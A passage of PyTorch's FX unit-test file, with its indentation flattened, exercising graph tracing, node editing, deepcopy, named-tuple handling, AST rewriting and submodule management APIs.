fxed = symbolic_trace(Foo())
fxed_scripted = torch.jit.script(fxed)
fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
def test_fn_type_annotation_empty(self):
def forward(a : List[torch.Tensor]):
return a[0]
torch.jit.script(symbolic_trace(forward))
def test_wrapped_method(self):
def wrap_with_relu(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
return torch.relu(fn(*args, **kwargs))
return wrapper
class Foo(torch.nn.Module):
@wrap_with_relu
def forward(self, x, w):
return torch.matmul(x, w)
f = Foo()
traced = symbolic_trace(f)
x, w = torch.rand(3, 4), torch.rand(4, 4)
self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes))
def test_empty_graph_codegen(self):
graph = torch.fx.Graph()
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(gm(), None)
def test_sequential(self):
m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1))
gm = torch.fx.symbolic_trace(m)
gm_copy = copy.deepcopy(gm)
def test_ctx_mgr(self):
@contextlib.contextmanager
def do_nothing():
yield
class M(torch.nn.Module):
def __init__(self):
super().__init__()
@do_nothing()
def forward(self, x):
return torch.relu(x)
m = M()
self.checkGraphModule(m, (torch.rand(3, 4),))
def test_typename_print(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,),
type_expr=List[float])
output : torch.fx.Node = graph.output(b)
self.assertTrue('typing.List[float]' in str(graph))
def test_layout(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
return torch.empty_like(x, layout=torch.strided, pin_memory=False).fill_(0)
traced = symbolic_trace(M())
x = torch.rand(5, 9, 3, 4)
self.assertEqual(traced(x), torch.zeros_like(x))
def test_ellipsis(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y):
return x + y[:, 1:10, ...]
traced = symbolic_trace(M())
x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4)
self.assertEqual(traced(x, y), x + y[:, 1:10, ...])
def test_inf_nan(self):
class FooMod(torch.nn.Module):
def forward(self, x):
return x + float('inf'), x + float('-inf'), x + float('nan')
fm = FooMod()
self.checkGraphModule(fm, (torch.rand(3, 4),))
def test_inf_nan_kwds(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf')
c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan')
graph.output((b, c))
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
x = torch.rand(3, 4)
self.assertEqual(gm(x), (x + float('inf'), x + float('nan')))
def test_deepcopy_recursion_depth(self):
depth = sys.getrecursionlimit() + 20
g = torch.fx.Graph()
x = g.placeholder('x')
for i in range(depth):
x = g.call_function(torch.relu, (x,))
g.output(x)
copied_graph = copy.deepcopy(g)
val_map = {}
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
val_map[orig_node] = new_node
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
orig_users = set(orig_node.users.keys())
orig_users_equiv = set(val_map[u] for u in orig_users)
new_users = set(new_node.users.keys())
self.assertEqual(orig_users_equiv, new_users)
@skipIfNoTorchVision
def test_replace_uses(self):
rn18 = torchvision_models.resnet18()
class LowerReluTracer(torch.fx.Tracer):
def is_leaf_module(self, m : torch.nn.Module, qualname : str):
if isinstance(m, torch.nn.ReLU):
return False
return super().is_leaf_module(m, qualname)
rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18))
to_erase = []
for node in rn18_traced.graph.nodes:
if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]:
kwargs = node.kwargs.copy()
# Neg doesn't have in-place
kwargs.pop('inplace')
with rn18_traced.graph.inserting_before(node):
new_node = rn18_traced.graph.call_function(
the_function=torch.neg, args=node.args, kwargs=node.kwargs)
node.replace_all_uses_with(replace_with=new_node)
to_erase.append(node)
for node in to_erase:
rn18_traced.graph.erase_node(node)
def test_replace_input(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
b.replace_input_with(x, y)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input_x = torch.randn(33, 44)
input_y = torch.randn(11, 22)
self.assertEqual(gm(input_x, input_y), torch.relu(input_y))
def test_insertion_point(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
with graph.inserting_before(b):
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_update_args_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_arg(0, y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_update_kwargs_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, kwargs={'input': x})
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_kwarg('input', y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_immutable_list_pytree_ops(self):
rand_tensor = torch.randn(5, 3)
l = immutable_list([3, [rand_tensor, 42]])
flattened, spec = pytree.tree_flatten(l)
assert flattened == [3, rand_tensor, 42]
unflattened = pytree.tree_unflatten(flattened, spec)
assert unflattened == l
assert isinstance(unflattened, immutable_list)
def test_immutable_dict_pytree_ops(self):
rand_tensor = torch.randn(5, 3)
d = immutable_dict({'a': 3, 'b': [rand_tensor, 42]})
flattened, spec = pytree.tree_flatten(d)
assert flattened == [3, rand_tensor, 42]
unflattened = pytree.tree_unflatten(flattened, spec)
assert unflattened == d
assert isinstance(unflattened, immutable_dict)
def test_move_before(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
b.prepend(neg)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_prepend_self(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
b.prepend(b)
x.append(b)
self.assertEqual(len(graph.nodes), 3)
def test_erase_node_error(self):
st = SimpleTest()
traced = symbolic_trace(st)
for node in traced.graph.nodes:
# Test deleting with uses both in another Node and at the output
if node.target in [operator.add, torch.relu]:
with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'):
traced.graph.erase_node(node)
def test_copy_it(self):
d = immutable_dict([(3, 4), (5, 6)])
l = immutable_list([(3, 4), (5, 6)])
self.assertEqual(d, deepcopy(d))
self.assertEqual(l, deepcopy(l))
def test_get_torch_func_signature(self):
for key in dir(torch):
obj = getattr(torch, key)
if callable(obj):
schemas = get_signature_for_torch_op(obj)
def test_find_uses(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
y = torch.relu(x)
z = x + x
u = torch.neg(x)
graph.output((y + z + u).node)
graph.lint()
users_of_x = x.node.users
self.assertEqual(len(users_of_x), 3)
expected_ops = set(['relu', 'add', 'neg'])
for use in users_of_x:
assert any(use.name.startswith(prefix) for prefix in expected_ops)
def test_inline_graph(self):
class InlineInto(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class ToInline(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
inline_into = symbolic_trace(InlineInto())
to_inline = symbolic_trace(ToInline())
combined_graph = torch.fx.Graph()
output_node = combined_graph.graph_copy(inline_into.graph, {})
input_node = list(to_inline.graph.nodes)[0]
assert input_node and input_node.op == 'placeholder'
val_map = {input_node : output_node}
output = combined_graph.graph_copy(to_inline.graph, val_map)
combined_graph.output(output)
combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph)
input = torch.rand(3, 4)
self.assertEqual(combined_module(input), input.relu().neg())
def test_multi_insert_point(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
relu = torch.relu(x)
with graph.inserting_before(relu.node):
y = torch.neg(x)
z = torch.tanh(y)
graph.output((relu.node, z.node))
graph.lint()
expected_ops = ['x', 'neg', 'tanh', 'relu']
for node, expected in zip(graph.nodes, expected_ops):
assert expected in node.name
def test_reassign_args_kwargs_uses(self):
graph = torch.fx.Graph()
x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y'))
z = x + y
zed = z + z + z
graph.output(zed.node)
graph.lint()
# zed = z + z + z -> zed = z + z + x
zed.node.args = (zed.node.args[0], x.node)
self.assertEqual(list(x.node.users.keys()), [z.node, zed.node])
# z = x + y -> z = y + y
z.node.args = (y.node, y.node)
self.assertEqual(list(x.node.users.keys()), [zed.node])
def test_trace_function(self):
def foo(x, y):
return torch.relu(x) + y
x, y = torch.randn(3, 4), torch.randn(3, 4)
self.checkGraphModule(foo, (x, y))
def test_trace_dict_int_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[int, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({42: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
traced_graph = MyTracer().trace(CallsModWithDict())
def test_trace_dict_proxy_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[torch.Tensor, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({x: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'):
traced_graph = MyTracer().trace(CallsModWithDict())
def test_module_deepcopy_edit_nodes(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
traced1 = symbolic_trace(Foo())
copied = copy.deepcopy(traced1)
for node in copied.graph.nodes:
if node.target == torch.relu:
node.target = torch.neg
copied.recompile()
traced1.recompile()
x = torch.randn(15, 15)
torch.testing.assert_allclose(traced1(x), torch.relu(x))
torch.testing.assert_allclose(copied(x), torch.neg(x))
def test_direct_param_use(self):
class TransposeTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.b = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.b
class Foo(torch.nn.Module):
def __init__(self):
super().__init__()
self.a = TransposeTest()
def forward(self, x):
return self.a.b, self.a.b.t(), self.a.b.view(12)
traced = torch.fx.symbolic_trace(Foo())
assert(all('constant' not in node.target for node in traced.graph.nodes))
def test_single_default_arg(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1):
return y
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
def test_multiple_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1, z=2):
return y + z
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
self.checkGraphModule(m, (3, 4))
def test_regular_and_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y=1):
return x + y
m = M()
self.checkGraphModule(m, (2,))
self.checkGraphModule(m, (2, 3))
def test_string_literal_return(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self):
return "foo"
m = M()
self.checkGraphModule(m, ())
def test_namedtuple_return_qualname(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return MyNamedTup(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), MyNamedTup(input, input))
def test_update_args_kwargs_yells_at_you(self):
symtraced = symbolic_trace(SimpleTest())
node = next(iter(symtraced.graph.nodes))
with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'):
node.__update_args_kwargs((), {})
def test_torchbind_class_attribute_in_fx(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping")
class FooBar1234(torch.nn.Module):
def __init__(self):
super(FooBar1234, self).__init__()
self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"])
def forward(self):
return self.f.top()
m = FooBar1234()
self.checkGraphModule(m, ())
def test_torchbind_class_attribute_in_fx_tensor_arg(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping")
class FooBar2341(torch.nn.Module):
def __init__(self):
super(FooBar2341, self).__init__()
self.f = torch.classes._TorchScriptTesting._ReLUClass()
def forward(self, x):
return self.f.run(x)
m = FooBar2341()
traced = symbolic_trace(m)
input = torch.randn(3, 4)
self.assertEqual(traced(input), m(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_script_method_trace(self):
class Scripted(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class Holder(torch.nn.Module):
def __init__(self):
super().__init__()
self.s = torch.jit.script(Scripted())
def forward(self, x):
return self.s(x)
h = Holder()
traced = symbolic_trace(h)
input = torch.randn(3, 4)
self.assertEqual(traced(input), h(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_namedtuple_return_trace(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return Pair(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), Pair(input, input))
def test_named_tuple_inlined(self):
class NamedTupMod(torch.nn.Module):
def forward(self, inp):
return wrapped_named_tup(Pair(inp, 1.2), p2=Pair(3.4, inp))
m = NamedTupMod()
input = torch.rand(3, 4)
ref = m(input)
traced = symbolic_trace(m)
res = traced(input)
self.assertEqual(ref, res)
# Check Pair NamedTuple works when inlined into the function call.
ph = call_func = None
for node in traced.graph.nodes:
if node.op == "placeholder":
ph = node
elif node.op == "call_function" and node.target == wrapped_named_tup:
node.update_arg(0, Pair(ph, 1.2))
node.update_kwarg("p2", Pair(3.4, ph))
call_func = node
break
self.assertTrue(call_func is not None)
self.assertTrue(isinstance(call_func.args[0], Pair))
self.assertTrue(isinstance(call_func.kwargs["p2"], Pair))
self.assertEqual(_format_arg(call_func.args[0]), "Pair(x=%inp, y=1.2)")
self.assertEqual(_format_arg(call_func.kwargs["p2"]), "Pair(x=3.4, y=%inp)")
traced.graph.eliminate_dead_code()
traced.recompile()
res = traced(input)
self.assertEqual(ref, res)
def test_return_type_exists(self):
class ReturnTypeModule(torch.nn.Module):
def other(self, x: List[str]) -> List[str]:
return x
def forward(self, x: List[str]) -> List[str]:
return self.other(x)
traced = symbolic_trace(ReturnTypeModule())
self.assertIn("-> typing_List[str]", traced._code)
scripted = torch.jit.script(traced)
self.assertIn("-> List[str]", scripted.code)
def getitem_inner(self):
class GetItemBase(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer('pe', torch.randn(8, 8))
class GetItem1(GetItemBase):
def forward(self, x):
return self.pe[:, :x.size(0)]
class GetItem2(GetItemBase):
def forward(self, x):
return self.pe[x.size(0)]
class GetItem3(GetItemBase):
def forward(self, x):
return self.pe[4] # fx creates `self._tensor_constant0` here
self.checkGraphModule(GetItem1(), [torch.zeros(4)])
self.checkGraphModule(GetItem2(), [torch.zeros(4)])
self.checkGraphModule(GetItem3(), [torch.zeros(4)])
@unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1",
"Will be checked in test_getitem_subproc")
def test_getitem(self):
self.getitem_inner()
def test_getitem_subproc(self):
# need to run this test in a subproc to work around:
# https://github.com/pytorch/pytorch/issues/50710
proc = Process(target=run_getitem_target)
proc.start()
proc.join()
self.assertEqual(proc.exitcode, 0)
def test_user_friendly_call_provenance_with_function(self):
def fn(x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(fn)
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'fn.forward'"):
scripted = torch.jit.script(traced)
def test_user_friendly_call_provenance_with_module(self):
class M(torch.nn.Module):
def forward(self, x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(M())
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'M.forward'"):
scripted = torch.jit.script(traced)
def test_snake_case(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.activations = torch.nn.ModuleDict([
["snake_case", torch.nn.ReLU()],
["PascalCase", torch.nn.LeakyReLU()],
["ALL_CAPS", torch.nn.PReLU()]
])
def forward(self, x):
a = self.activations["snake_case"](x)
b = self.activations["PascalCase"](x)
c = self.activations["ALL_CAPS"](x)
return a, b, c
traced = symbolic_trace(M())
check = [
("activations_snake_case", "activations.snake_case"),
("activations_pascal_case", "activations.PascalCase"),
("activations_all_caps", "activations.ALL_CAPS")
]
i = 0
for node in traced.graph.nodes:
if node.op == "placeholder" or node.op == "output":
continue
name = check[i][0]
target = check[i][1]
self.assertEqual(name, node.name)
self.assertEqual(target, node.target)
i += 1
self.assertEqual(i, 3)
def test_no_mutation(self):
from torch.fx.immutable_collections import immutable_list
x = immutable_list([3, 4])
with self.assertRaisesRegex(NotImplementedError, "new_args"):
x[0] = 4
def test_partial_trace(self):
class Foo(torch.nn.Module):
def forward(self, x, y):
if y:
return 2 * x
else:
return x
mod = Foo()
mod_true = symbolic_trace(mod, concrete_args={'y': True})
mod_false = symbolic_trace(mod, concrete_args={'y': False})
self.assertEqual(mod_true(3, True), 6)
print(mod_true.code)
assert(any([i.target == torch._assert for i in mod_true.graph.nodes]))
with self.assertRaises(AssertionError):
mod_true(3, False)
self.assertEqual(mod_false(3, False), 3)
with self.assertRaises(AssertionError):
mod_false(3, True)
def f_higher(a, f):
return f(a)
nf = symbolic_trace(f_higher, concrete_args={'f': lambda x: x * 2})
self.assertEqual(nf(3, lambda x: x * 2), 6)
def test_custom_traceback_raised_when_exception_source_is_graphmodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.W = torch.nn.Parameter(torch.randn(5))
def forward(self, x):
return torch.dot(self.W, x)
traced = torch.fx.symbolic_trace(M())
out = [n for n in traced.graph.nodes if n.op == "output"][-1]
with traced.graph.inserting_before(out):
relu_out = traced.graph.call_method(method_name='relu',
args=(out.args[0],))
out.args = (relu_out,)
traced.recompile()
with self.capture_stderr() as captured:
with self.assertRaises(TypeError):
traced(5)
self.assertRegex(captured[0],
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_custom_traceback_not_raised_when_exception_source_is_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(3, 4)
def forward(self, x):
return self.linear(x)
traced = torch.fx.symbolic_trace(M())
# Do not change this to `capture_stderr` or another context
# manager without ensuring that the output is as expected
try:
traced(torch.rand(5, 5))
except RuntimeError:
captured = traceback.format_exc()
self.assertNotRegex(captured,
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_graph_module_replicate_for_dp(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
gm = torch.fx.symbolic_trace(Foo())
x = torch.randn(5, 3)
out = gm(x)
replica = gm._replicate_for_data_parallel()
out_replica = replica(x)
torch.testing.assert_allclose(out_replica, out)
def test_ast_rewriter_rewrites_assert(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_rewrites_assert_with_message(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z, "msg"
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_throw_out_variant(self):
def foo(x):
y = torch.rand_like(x)
torch.sigmoid(x, out=y)
return y
class MyTracer(torch.fx.Tracer):
check_mutable_operations = True
tracer = MyTracer()
with self.assertRaisesRegex(RuntimeError, 'mutable operation aten::sigmoid.out'):
traced_graph = tracer.trace(foo)
def test_ast_rewriter_reassigns_submodules(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.bn = torch.nn.BatchNorm2d(100)
def forward(self, x: torch.Tensor):
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf((4, y), 3)
+ a_lifted_leaf((3, 4), 5)
+ a_lifted_leaf((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_ast_rewriter_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf2((4, y), 3)
+ a_lifted_leaf2((3, 4), 5)
+ a_lifted_leaf2((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf2", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_profiler_ranges_side_effect(self):
g = torch.fx.Graph()
handle = g.call_function(torch.ops.profiler._record_function_enter, ('test_range',))
g.call_function(torch.ops.profiler._record_function_exit, (handle,))
g.output(None)
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
list(found_targets.keys()),
[torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit]
)
g.eliminate_dead_code()
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
list(found_targets.keys()),
[torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit]
)
def test_ast_rewriter_wrapped_via_decorator(self):
class F(torch.nn.Module):
def forward(self, x):
return wrapped_via_decorator(x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(F())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(traced).transform()
self.assertIn("wrapped_via_decorator", transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_with_submodule", traced.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), traced(input))
def test_submodule_manipulation_API(self):
class C(torch.nn.Module):
def __init__(self):
super(C, self).__init__()
self.conv = torch.nn.Conv2d(16, 33, 3, stride=2)
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.conv(torch.cat([self.param, x]))
class B(torch.nn.Module):
def __init__(self):
super(B, self).__init__()
self.linear = torch.nn.Linear(100, 200)
self.register_buffer("buf", torch.randn(2, 3))
self.net_c = C()
def forward(self, x):
return self.linear(torch.cat([self.buf, self.net_c(x)]))
class A(torch.nn.Module):
def __init__(self):
super(A, self).__init__()
self.net_b = B()
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.net_b(x) + self.param
a = symbolic_trace(A())
a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2))
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1]
with a.graph.inserting_before(conv):
with warnings.catch_warnings(record=True) as w:
dropout = a.graph.call_module(module_name="net_b.net_c.dropout",
args=conv.args)
self.assertEqual(len(w), 0)
conv.replace_all_uses_with(dropout)
a.graph.erase_node(conv)
a.recompile()
def module_exists(gm: GraphModule, path: str) -> bool:
return any(path == name for name, _ in gm.named_modules())
def parameter_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_parameters())
and any(path == name for name in gm.state_dict().keys()))
def buffer_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_buffers())
and any(path == name for name in gm.state_dict().keys()))
# Test that we added the "dropout" submodule
self.assertTrue(module_exists(a, "net_b.net_c.dropout"))
# Test `get_submodule` with an added submodule
self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout"))
# Test that the "conv" submodule is still there
self.assertTrue(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with an original module
self.assertIsNotNone(a.get_submodule("net_b.net_c.conv"))
# Test that the "conv" node is NOT still there
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"]
self.assertEqual(conv, [])
a.delete_submodule("net_b.net_c.conv")
# Test that the "conv" submodule is now gone
self.assertFalse(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with a deleted submodule
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`conv`"):
self.assertIsNone(a.get_submodule("net_b.net_c.conv"))
# Test `get_attr` warnings
cat = [n for n in a.graph.nodes if n.target == torch.cat][-1]
with a.graph.inserting_before(cat):
with warnings.catch_warnings(record=True) as w:
param = a.graph.get_attr(qualified_name="net_b.net_c.param")
self.assertEqual(len(w), 0)
with self.assertWarnsRegex(UserWarning, "Attempted to "
"insert a get_attr Node with no "
"underlying reference in the "
"owning GraphModule"):
bad_param = a.graph.get_attr(qualified_name="net_b.param")
a.graph.erase_node(bad_param)
cat.args = (*cat.args, param)
a.recompile()
a.graph.lint()
# Test `get_parameter`
a.get_parameter("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "is not an "
"nn.Parameter"):
a.get_parameter("net_b.buf")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`param`"):
a.get_parameter("net_b.param")
# Test `get_buffer`
a.get_buffer("net_b.buf")
with self.assertRaisesRegex(AttributeError, "is not a "
"buffer"):
a.get_buffer("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`buf`"):
a.get_buffer("net_b.net_c.buf")
# Test non-nested attributes
a.get_submodule("")
a.get_parameter("param")
# Insert some unused submodules
a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2))
a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100))
# Garbage collection
a.delete_all_unused_submodules()
# Test that all the unused submodules are gone
self.assertFalse(module_exists(a, "net_b.embedding"))
